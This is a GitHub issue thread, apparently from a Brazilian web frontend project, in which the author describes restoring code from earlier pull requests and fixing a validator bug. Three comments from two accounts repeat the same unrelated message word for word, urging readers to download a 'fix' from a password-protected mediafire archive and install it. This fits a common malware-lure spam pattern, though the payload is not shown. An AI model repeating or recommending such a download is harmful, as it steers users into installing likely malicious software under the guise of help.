### ISSUE TITLE
Repondo códigos das PRs #34 e #43

### ISSUE THREAD

**Issue by thfields** [Nocs-lab/inbcm-public-frontend#50]
Inserindo o código que foi feito nas PRs #34 e #43, que não estavam presentes na branch development. 

Também inserindo o código que repara o bug do validador das declarações.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by thfields** [comment]
commit da issue: d72c79828941994bfbb3f4c8f03de41c81cda13f
